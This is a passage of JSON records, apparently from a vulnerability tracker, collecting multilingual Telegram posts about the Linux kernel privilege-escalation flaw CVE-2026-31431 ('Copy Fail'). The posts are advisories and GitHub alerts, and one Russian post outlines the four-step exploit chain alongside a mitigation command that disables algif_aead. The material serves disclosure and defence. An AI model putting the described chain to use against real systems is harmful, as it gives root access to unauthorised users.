\u0448\u0435\u043b\u043b\u043a\u043e\u0434\u0430 \u0438 \u0437\u0430\u043f\u0443\u0441\u043a\u0430 \u0435\u0433\u043e \u043e\u0442 \u0438\u043c\u0435\u043d\u0438 root.\n\n\u041d\u0435\u0441\u043c\u043e\u0442\u0440\u044f \u043d\u0430 \u0442\u043e, \u0447\u0442\u043e \u0441\u0430\u043c\u0430 \u043f\u043e \u0441\u0435\u0431\u0435 \u044d\u0442\u0430 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043d\u0435 \u043c\u043e\u0436\u0435\u0442 \u0431\u044b\u0442\u044c \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0430 \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u043e, \u043b\u043e\u043a\u0430\u043b\u044c\u043d\u044b\u0439 \u043d\u0435\u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u0439 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044c \u043c\u043e\u0436\u0435\u0442 \u043f\u043e\u043b\u0443\u0447\u0438\u0442\u044c root-\u043f\u0440\u0430\u0432\u0430, \u043f\u0440\u043e\u0441\u0442\u043e \u043f\u043e\u0432\u0440\u0435\u0434\u0438\u0432 \u043a\u044d\u0448 \u0441\u0442\u0440\u0430\u043d\u0438\u0446 \u0438\u0441\u043f\u043e\u043b\u043d\u044f\u0435\u043c\u043e\u0433\u043e \u0444\u0430\u0439\u043b\u0430 \u0441 \u0443\u0441\u0442\u0430\u043d\u043e\u0432\u043b\u0435\u043d\u043d\u044b\u043c \u0444\u043b\u0430\u0433\u043e\u043c setuid.\n\n\u042d\u0442\u0430 \u0436\u0435 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0442\u0430\u043a\u0436\u0435 \u0438\u043c\u0435\u0435\u0442 \u043f\u043e\u0441\u043b\u0435\u0434\u0441\u0442\u0432\u0438\u044f \u0434\u043b\u044f \u0434\u0440\u0443\u0433\u0438\u0445 \u043a\u043e\u043d\u0442\u0435\u0439\u043d\u0435\u0440\u043e\u0432, \u043f\u043e\u0441\u043a\u043e\u043b\u044c\u043a\u0443 \u043a\u044d\u0448 \u0441\u0442\u0440\u0430\u043d\u0438\u0446 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442\u0441\u044f \u0432\u0441\u0435\u043c\u0438 \u043f\u0440\u043e\u0446\u0435\u0441\u0441\u0430\u043c\u0438 \u0432 \u0441\u0438\u0441\u0442\u0435\u043c\u0435.\n\n\u0412 \u0441\u0432\u043e\u044e \u043e\u0447\u0435\u0440\u0435\u0434\u044c, \u0432 \u043e\u0442\u0432\u0435\u0442 \u043d\u0430 \u0440\u0430\u0441\u043a\u0440\u044b\u0442\u0438\u0435 \u0440\u0430\u0437\u0440\u0430\u0431\u043e\u0442\u0447\u0438\u043a\u0438 \u0440\u0430\u0437\u043b\u0438\u0447\u043d\u044b\u0445  \u0434\u0438\u0441\u0442\u0440\u0438\u0431\u0443\u0442\u0438\u0432\u043e\u0432 Linux \u0432\u044b\u043f\u0443\u0441\u0442\u0438\u043b\u0438 \u0441\u043e\u0431\u0441\u0442\u0432\u0435\u043d\u043d\u044b\u0435 \u043f\u0440\u0435\u0434\u0443\u043f\u0440\u0435\u0436\u0434\u0435\u043d\u0438\u044f (Amazon Linux, Debian, Red Hat Enterprise Linux, SUSE \u0438 Ubuntu)\n\n\u041f\u0440\u0438\u043c\u0435\u0447\u0441\u0430\u0442\u0435\u043b\u044c\u043d\u043e, \u0447\u0442\u043e Copy Fail \u043f\u0435\u0440\u0435\u043a\u043b\u0438\u043a\u0430\u0435\u0442\u0441\u044f \u0441 Dirty Pipe (CVE-2022-0847), \u0434\u0440\u0443\u0433\u043e\u0439 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c\u044e LPE \u0432 \u044f\u0434\u0440\u0435 Linux, \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u043d\u0435\u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u043c \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f\u043c \u0432\u043d\u0435\u0434\u0440\u044f\u0442\u044c \u0434\u0430\u043d\u043d\u044b\u0435 \u0432 \u043a\u044d\u0448 \u0441\u0442\u0440\u0430\u043d\u0438\u0446 \u0444\u0430\u0439\u043b\u043e\u0432, \u0434\u043e\u0441\u0442\u0443\u043f\u043d\u044b\u0445 \u0442\u043e\u043b\u044c\u043a\u043e \u0434\u043b\u044f \u0447\u0442\u0435\u043d\u0438\u044f, \u0438 \u0432 \u043a\u043e\u043d\u0435\u0447\u043d\u043e\u043c \u0438\u0442\u043e\u0433\u0435 \u043f\u0435\u0440\u0435\u0437\u0430\u043f\u0438\u0441\u044b\u0432\u0430\u0442\u044c \u043a\u043e\u043d\u0444\u0438\u0434\u0435\u043d\u0446\u0438\u0430\u043b\u044c\u043d\u044b\u0435 \u0444\u0430\u0439\u043b\u044b \u0432 \u0441\u0438\u0441\u0442\u0435\u043c\u0435 \u0434\u043b\u044f \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044f \u043a\u043e\u0434\u0430.\n\n\u041a\u0430\u043a \u043e\u0442\u043c\u0435\u0442\u0438\u043b\u0438 \u0432 Bugcrowd, \u043e\u0448\u0438\u0431\u043a\u0430 \u043a\u043e\u043f\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u044f - \u044d\u0442\u043e \u043f\u0440\u0438\u043c\u0438\u0442\u0438\u0432 \u0442\u043e\u0433\u043e \u0436\u0435 \u043a\u043b\u0430\u0441\u0441\u0430, \u043d\u043e \u0432 \u0434\u0440\u0443\u0433\u043e\u0439 \u043f\u043e\u0434\u0441\u0438\u0441\u0442\u0435\u043c\u0435. \u041e\u043f\u0442\u0438\u043c\u0438\u0437\u0430\u0446\u0438\u044f \u043d\u0430 \u043c\u0435\u0441\u0442\u0435 2017 \u0433\u043e\u0434\u0430 \u0432 algif_aead \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u0441\u0442\u0440\u0430\u043d\u0438\u0446\u0435 \u043a\u044d\u0448\u0430 \u0441\u0442\u0440\u0430\u043d\u0438\u0446 \u043f\u043e\u043f\u0430\u0441\u0442\u044c \u0432 \u0441\u043f\u0438\u0441\u043e\u043a \u0434\u043e\u0441\u0442\u0443\u043f\u043d\u044b\u0445 \u0434\u043b\u044f \u0437\u0430\u043f\u0438\u0441\u0438 \u0446\u0435\u043b\u0435\u0432\u044b\u0445 \u0444\u0430\u0439\u043b\u043e\u0432 \u044f\u0434\u0440\u0430 \u0434\u043b\u044f \u043e\u043f\u0435\u0440\u0430\u0446\u0438\u0438 AEAD, \u043e\u0442\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u043d\u043e\u0439 \u0447\u0435\u0440\u0435\u0437 \u0441\u043e\u043a\u0435\u0442 AF_ALG.\n\n\u041d\u0435\u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u0439 \u043f\u0440\u043e\u0446\u0435\u0441\u0441 \u0437\u0430\u0442\u0435\u043c \u043c\u043e\u0436\u0435\u0442 \u0437\u0430\u043f\u0443\u0441\u0442\u0438\u0442\u044c splice() \u0432 \u044d\u0442\u043e\u043c \u0441\u043e\u043a\u0435\u0442\u0435 \u0438 \u0432\u044b\u043f\u043e\u043b\u043d\u0438\u0442\u044c \u043d\u0435\u0431\u043e\u043b\u044c\u0448\u0443\u044e \u0446\u0435\u043b\u0435\u0432\u0443\u044e \u0437\u0430\u043f\u0438\u0441\u044c \u0432 \u043a\u044d\u0448 \u0441\u0442\u0440\u0430\u043d\u0438\u0446 \u0444\u0430\u0439\u043b\u0430, \u043a\u043e\u0442\u043e\u0440\u044b\u043c \u043e\u043d \u043d\u0435 \u0432\u043b\u0430\u0434\u0435\u0435\u0442\u00bb.\n\n\u041e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u044c \u044d\u0442\u043e\u0439 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0437\u0430\u043a\u043b\u044e\u0447\u0430\u0435\u0442\u0441\u044f \u0432 \u0442\u043e\u043c, \u0447\u0442\u043e \u043e\u043d\u0430 \u043c\u043e\u0436\u0435\u0442 \u0431\u044b\u0442\u044c \u0447\u0435\u0442\u043a\u043e \u0430\u043a\u0442\u0438\u0432\u0438\u0440\u043e\u0432\u0430\u043d\u0430 \u0438 \u043d\u0435 \u0442\u0440\u0435\u0431\u0443\u0435\u0442 \u043d\u0430\u043b\u0438\u0447\u0438\u044f \u0441\u043e\u0441\u0442\u043e\u044f\u043d\u0438\u0439 \u0433\u043e\u043d\u043a\u0438 \u0438\u043b\u0438 \u0441\u043c\u0435\u0449\u0435\u043d\u0438\u044f \u044f\u0434\u0440\u0430. \u0411\u043e\u043b\u0435\u0435 \u0442\u043e\u0433\u043e, \u043e\u0434\u0438\u043d \u0438 \u0442\u043e\u0442 \u0436\u0435 \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442 \u0440\u0430\u0431\u043e\u0442\u0430\u0435\u0442 \u0432\u043e \u0432\u0441\u0435\u0445 \u0434\u0438\u0441\u0442\u0440\u0438\u0431\u0443\u0442\u0438\u0432\u0430\u0445.\n\n\u0412 \u0446\u0435\u043b\u043e\u043c, \u0432 Xint.io \u0435\u0435 \u0441\u0447\u0438\u0442\u0430\u044e\u0442 \u0443\u043d\u0438\u043a\u0430\u043b\u044c\u043d\u043e\u0439, \u043f\u043e\u0441\u043a\u043e\u043b\u044c\u043a\u0443 \u043e\u043d\u0430 \u043e\u0431\u043b\u0430\u0434\u0430\u0435\u0442 \u0447\u0435\u0442\u044b\u0440\u044c\u043c\u044f \u0441\u0432\u043e\u0439\u0441\u0442\u0432\u0430\u043c\u0438, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u043f\u043e\u0447\u0442\u0438 \u043d\u0438\u043a\u043e\u0433\u0434\u0430 \u043d\u0435 \u0432\u0441\u0442\u0440\u0435\u0447\u0430\u044e\u0442\u0441\u044f \u0432\u043c\u0435\u0441\u0442\u0435: \u043f\u043e\u0440\u0442\u0430\u0442\u0438\u0432\u043d\u0430, \u043c\u0438\u043d\u0438\u0430\u0442\u044e\u0440\u043d\u0430, \u0441\u043a\u0440\u044b\u0442\u043d\u0430 \u0438 \u0441\u043e\u0432\u043c\u0435\u0441\u0442\u0438\u043c\u0430 \u0441 \u0440\u0430\u0437\u043b\u0438\u0447\u043d\u044b\u043c\u0438 \u043a\u043e\u043d\u0442\u0435\u0439\u043d\u0435\u0440\u0430\u043c\u0438.\n\n\u041e\u043d\u0430 \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u043b\u044e\u0431\u043e\u0439 \u0443\u0447\u0435\u0442\u043d\u043e\u0439 \u0437\u0430\u043f\u0438\u0441\u0438 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f, \u043d\u0435\u0437\u0430\u0432\u0438\u0441\u0438\u043c\u043e \u043e\u0442 \u0443\u0440\u043e\u0432\u043d\u044f \u0435\u0435 \u0434\u043e\u0441\u0442\u0443\u043f\u0430, \u043f\u043e\u0432\u044b\u0441\u0438\u0442\u044c \u0441\u0432\u043e\u0438 \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0438 \u0434\u043e \u043f\u043e\u043b\u043d\u043e\u0433\u043e \u0430\u0434\u043c\u0438\u043d\u0438\u0441\u0442\u0440\u0430\u0442\u0438\u0432\u043d\u043e\u0433\u043e \u0434\u043e\u0441\u0442\u0443\u043f\u0430. \u041e\u043d\u0430 \u0442\u0430\u043a\u0436\u0435 \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u043e\u0431\u0445\u043e\u0434\u0438\u0442\u044c \u043f\u0435\u0441\u043e\u0447\u043d\u0438\u0446\u0443 \u0438 \u0440\u0430\u0431\u043e\u0442\u0430\u0435\u0442 \u0432\u043e \u0432\u0441\u0435\u0445 \u0432\u0435\u0440\u0441\u0438\u044f\u0445 \u0438 \u0434\u0438\u0441\u0442\u0440\u0438\u0431\u0443\u0442\u0438\u0432\u0430\u0445 Linux.", "creation_timestamp": "2026-04-30T11:37:09.000000Z"}, {"uuid": "617440b9-f58c-4ec8-91d3-91466589ed20", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://t.me/CyberSecurityIL/84118", "content": "\u05e9\u05d9\u05de\u05d5 \u05dc\u05d1 \u05dc\u05d7\u05d5\u05dc\u05e9\u05d4 CVE-2026-31431 \u05e9\u05e7\u05d9\u05d1\u05dc\u05d4 \u05d0\u05ea \u05d4\u05db\u05d9\u05e0\u05d5\u05d9 copy.fail.\n\n\u05d4\u05d7\u05d5\u05dc\u05e9\u05d4 \u05de\u05d0\u05e4\u05e9\u05e8\u05ea \u05dc\u05de\u05e9\u05ea\u05de\u05e9 \u05de\u05e7\u05d5\u05de\u05d9 \u05dc\u05d4\u05e2\u05dc\u05d5\u05ea \u05d0\u05ea \u05e8\u05de\u05ea \u05d4\u05d4\u05e8\u05e9\u05d0\u05d5\u05ea \u05dc\u05d0\u05d3\u05de\u05d9\u05df, \u05d5\u05de\u05e9\u05e4\u05d9\u05e2\u05d4 \u05db\u05de\u05e2\u05d8 \u05e2\u05dc \u05db\u05dc \u05de\u05e2\u05e8\u05db\u05d5\u05ea \u05dc\u05d9\u05e0\u05d5\u05e7\u05e1 \u05de\u05d0\u05d6 2017.\n\n\u05e4\u05e8\u05d8\u05d9\u05dd \u05e0\u05d5\u05e1\u05e4\u05d9\u05dd \u05db\u05d0\u05df:\nhttps://copy.fail/\n\nhttps://t.me/CyberSecurityIL/8855", "creation_timestamp": "2026-04-30T12:10:00.000000Z"}, {"uuid": "6a69a951-a178-4e51-a9bd-2b3848333ce8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "Telegram/zaqwNqROxErLoAZPLGjrhKFpw_N1uc9fU_v0iMfTvi3pqoU", "content": "", "creation_timestamp": "2026-04-30T17:35:09.000000Z"}, {"uuid": "789663c9-b676-429d-a4b7-482b36fe80ba", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "Telegram/uz1G0onC-r3WtTIw0HLlakU1YJEK6W_ZeyIZzJtVrph5nPM", "content": "", "creation_timestamp": "2026-05-01T05:24:17.000000Z"}, {"uuid": "c9663542-08f2-4986-accc-3f72114ac747", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://t.me/GithubRedTeam/82399", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #CVE-2026\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a fix_CVE-2026-31431\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a kdjnb\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a Shell\n\u2b50 Star\u6570\u91cf\uff1a 0  |  \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-05-02 00:57:58\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\n\u7834\u574fCVE-2026-31431\u6240\u9700\u7684\u6f0f\u6d1e\u7ec4\u4ef6\uff0c\u4ece\u800c\u8fbe\u5230\u65e0\u6cd5\u901a\u8fc7CVE-2026-31431\u63d0\u6743\u3002\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-05-02T01:00:04.000000Z"}, {"uuid": "5397ede4-bb02-4217-9073-c9b785c0ddb8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://t.me/ptescalator/714", "content": "Copy.Fail \ud83d\udc27\n\n\u0418\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u0438 \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0438\u043b\u0438 \u0431\u0430\u0433 \u0432 \u044f\u0434\u0440\u0435 Linux, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u0441\u0443\u0449\u0435\u0441\u0442\u0432\u043e\u0432\u0430\u043b \u0432 \u0441\u0438\u0441\u0442\u0435\u043c\u0430\u0445 \u0441 2017 \u0433\u043e\u0434\u0430 \u0438 \u0437\u0430\u0442\u0440\u0430\u0433\u0438\u0432\u0430\u0435\u0442 \u043f\u0440\u0430\u043a\u0442\u0438\u0447\u0435\u0441\u043a\u0438 \u0432\u0441\u0435 \u0434\u0438\u0441\u0442\u0440\u0438\u0431\u0443\u0442\u0438\u0432\u044b.\n\n\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c CVE-2026-31431, \u043a\u043e\u0442\u043e\u0440\u0443\u044e \u043c\u044b \u0441\u0447\u0438\u0442\u0430\u0435\u043c \u0442\u0440\u0435\u043d\u0434\u043e\u0432\u043e\u0439, \u0441\u043e\u0441\u0442\u043e\u0438\u0442 \u0438\u0437 \u0447\u0435\u0442\u044b\u0440\u0435\u0445 \u0448\u0430\u0433\u043e\u0432:\n\n1\ufe0f\u20e3 \u041f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044c \u043e\u0442\u043a\u0440\u044b\u0432\u0430\u0435\u0442 \u0441\u043e\u043a\u0435\u0442 AF_ALG \u0438 \u0438\u043d\u0438\u0446\u0438\u0430\u043b\u0438\u0437\u0438\u0440\u0443\u0435\u0442 AEAD-\u0430\u043b\u0433\u043e\u0440\u0438\u0442\u043c \u0431\u0435\u0437 \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0439;\n\n2\ufe0f\u20e3 \u0427\u0435\u0440\u0435\u0437 splice() \u0441\u0442\u0440\u0430\u043d\u0438\u0446\u044b \u043a\u044d\u0448\u0430 \u0446\u0435\u043b\u0435\u0432\u043e\u0433\u043e \u0444\u0430\u0439\u043b\u0430 \u043f\u043e\u043f\u0430\u0434\u0430\u044e\u0442 \u0432 \u0431\u0443\u0444\u0435\u0440 \u043e\u043f\u0435\u0440\u0430\u0446\u0438\u0438;\n\n3\ufe0f\u20e3 \u041e\u0448\u0438\u0431\u043a\u0430 \u0432 authencesn \u0434\u0430\u0435\u0442 \u0437\u0430\u043f\u0438\u0441\u044c 4 \u0431\u0430\u0439\u0442 \u0437\u0430 \u0433\u0440\u0430\u043d\u0438\u0446\u044b \u0431\u0443\u0444\u0435\u0440\u0430 \u043f\u0440\u044f\u043c\u043e \u0432 \u0441\u0442\u0440\u0430\u043d\u0438\u0446\u044b \u043a\u044d\u0448\u0430;\n\n4\ufe0f\u20e3 \u042f\u0434\u0440\u043e \u0438\u0441\u043f\u043e\u043b\u043d\u044f\u0435\u0442 \u043c\u043e\u0434\u0438\u0444\u0438\u0446\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u0439 setuid-\u0444\u0430\u0439\u043b \u0438\u0437 \u043a\u044d\u0448\u0430 \u2192 \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u0435 \u043a\u043e\u0434\u0430 \u0441 \u043f\u0440\u0430\u0432\u0430\u043c\u0438 root.\n\n\u0414\u0430\u043d\u043d\u0430\u044f \u0446\u0435\u043f\u043e\u0447\u043a\u0430 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0447\u0430\u0441\u0442\u0438\u0447\u043d\u043e \u0441\u0445\u043e\u0436\u0430 \u0441 Dirty Pipe (CVE-2022-0847), \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u0442\u0430\u043a\u0436\u0435 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442 \u0441\u0438\u0441\u0442\u0435\u043c\u043d\u044b\u0435 \u0432\u044b\u0437\u043e\u0432\u044b:\n\n\u2022 pipe \u2014 \u0441\u043e\u0437\u0434\u0430\u0435\u0442 \u043e\u0434\u043d\u043e\u043d\u0430\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u043d\u044b\u0439 \u043a\u0430\u043d\u0430\u043b \u043f\u0435\u0440\u0435\u0434\u0430\u0447\u0438 \u0434\u0430\u043d\u043d\u044b\u0445;\n\n\u2022 splice \u2014 \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u043f\u0435\u0440\u0435\u0434\u0430\u0432\u0430\u0442\u044c \u0434\u0430\u043d\u043d\u044b\u0435 \u043c\u0435\u0436\u0434\u0443 \u0444\u0430\u0439\u043b\u043e\u0432\u044b\u043c\u0438 \u0434\u0435\u0441\u043a\u0440\u0438\u043f\u0442\u043e\u0440\u0430\u043c\u0438 \u0431\u0435\u0437 \u043f\u0440\u043e\u043c\u0435\u0436\u0443\u0442\u043e\u0447\u043d\u043e\u0433\u043e \u043a\u043e\u043f\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u044f.\n\n\u0422\u0430\u043a \u043a\u0430\u043a \u0434\u0430\u043d\u043d\u0430\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0443\u0436\u0435 \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0438\u0432\u0430\u043b\u0430\u0441\u044c \u0432 PT Sandbox \u043f\u0440\u0438 \u0430\u043d\u0430\u043b\u0438\u0437\u0435 \u041f\u041e \u0432 \u043e\u0431\u0440\u0430\u0437\u0435 Astra Linux, \u043f\u0440\u043e\u0446\u0435\u0441\u0441 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438 \u043d\u043e\u0432\u043e\u0439 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 Copy Fail \u0442\u0430\u043a\u0436\u0435 \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0438\u0432\u0430\u043b\u0430\u0441\u044c \u0432 PT Sandbox \u0435\u0449\u0435 \u0434\u043e \u0432\u044b\u0445\u043e\u0434\u0430 \u043f\u0443\u0431\u043b\u0438\u0447\u043d\u043e\u0433\u043e \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442\u0430.\n\n\u0411\u043b\u0430\u0433\u043e\u0434\u0430\u0440\u044f \u044d\u0442\u043e\u043c\u0443 \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442\u0443 \u043c\u043e\u0436\u043d\u043e \u043f\u0435\u0440\u0435\u0437\u0430\u043f\u0438\u0441\u044b\u0432\u0430\u0442\u044c \u043d\u0435 \u0442\u043e\u043b\u044c\u043a\u043e suid-\u0444\u0430\u0439\u043b\u044b, \u043d\u043e \u0438 \u043f\u0440\u043e\u0432\u043e\u0434\u0438\u0442\u044c \u0434\u0440\u0443\u0433\u0438\u0435 \u043c\u043e\u0434\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u0438, \u0434\u0435\u043b\u0430\u044f \u0441\u0438\u0441\u0442\u0435\u043c\u043d\u044b\u0435 \u0438\u0437\u043c\u0435\u043d\u0435\u043d\u0438\u044f \u0431\u043e\u043b\u0435\u0435 \u0441\u043a\u0440\u044b\u0442\u043d\u044b\u043c\u0438.\n\n\u041a\u0430\u043a \u0438\u0441\u043f\u0440\u0430\u0432\u0438\u0442\u044c \ud83d\udd27\n\n\u0415\u0441\u043b\u0438 \u0432\u044b \u0430\u0434\u043c\u0438\u043d\u0438\u0441\u0442\u0440\u0438\u0440\u0443\u0435\u0442\u0435 Linux-\u0441\u0438\u0441\u0442\u0435\u043c\u044b \u2014 \u043e\u0431\u043d\u043e\u0432\u0438\u0442\u0435 \u044f\u0434\u0440\u043e. \u041f\u0430\u0442\u0447 \u0437\u0430\u0444\u0438\u043a\u0441\u0438\u0440\u043e\u0432\u0430\u043d \u0432 \u043a\u043e\u043c\u043c\u0438\u0442\u0435 a664bf3d603d. \u041e\u0441\u043d\u043e\u0432\u043d\u044b\u0435 \u0434\u0438\u0441\u0442\u0440\u0438\u0431\u0443\u0442\u0438\u0432\u044b \u043d\u0430\u0447\u0430\u043b\u0438 \u0432\u044b\u043f\u0443\u0441\u043a\u0430\u0442\u044c \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u043d\u044b\u0435 \u043f\u0430\u043a\u0435\u0442\u044b \u0441 29 \u0430\u043f\u0440\u0435\u043b\u044f. \u041f\u043e\u0441\u043b\u0435 \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u044f \u043f\u043e\u0442\u0440\u0435\u0431\u0443\u0435\u0442\u0441\u044f \u043f\u0435\u0440\u0435\u0437\u0430\u0433\u0440\u0443\u0437\u043a\u0430.\n\n\u0415\u0441\u043b\u0438 \u043d\u0435\u043c\u0435\u0434\u043b\u0435\u043d\u043d\u043e\u0435 \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u0435 \u043d\u0435\u0432\u043e\u0437\u043c\u043e\u0436\u043d\u043e \u2014 \u0432\u0440\u0435\u043c\u0435\u043d\u043d\u0430\u044f \u043c\u0435\u0440\u0430: \u043e\u0442\u043a\u043b\u044e\u0447\u0438\u0442\u044c \u043c\u043e\u0434\u0443\u043b\u044c algif_aead:\n\n\necho \"install algif_aead /bin/false\" > /etc/modprobe.d/disable-algif-aead.conf\n\nrmmod algif_aead 2>/dev/null\n\n#cve #tip\n@ptescalator", "creation_timestamp": "2026-04-30T14:57:47.000000Z"}, {"uuid": "eae8e270-7ae3-4621-b321-42ae800c2132", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://t.me/GithubRedTeam/82406", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #CVE-2026\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a modrosnlr5\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a ROSNLR5\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a Python\n\u2b50 Star\u6570\u91cf\uff1a 0  |  \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-05-02 02:58:53\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\nLinux Kernel LPE PoC (CVE-2026-31431)\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-05-02T03:00:04.000000Z"}, {"uuid": "e49a4bf7-1364-4dd0-ac00-594f38f2d7c0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://t.me/GithubRedTeam/82412", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #CVE-2026\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a cve-2026-31431\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a ashok523\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a HTML\n\u2b50 Star\u6570\u91cf\uff1a 0  |  \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-05-02 03:38:34\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\nhe recently disclosed CVE-2026-31431 \u2014 also known as Copy Fail \u2014 is not something to take lightly. \n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-05-02T04:00:04.000000Z"}, {"uuid": "c4b76f63-f90b-43e1-9f49-252c46319142", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "Telegram/KspXoTAZwNnyoY0fEBjlny_6gTq9EiPaKDTUOSCE9_4iY-U", "content": "", "creation_timestamp": "2026-04-29T23:00:12.000000Z"}, {"uuid": "1418487a-3d27-4174-b26c-8c75938c38ef", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", 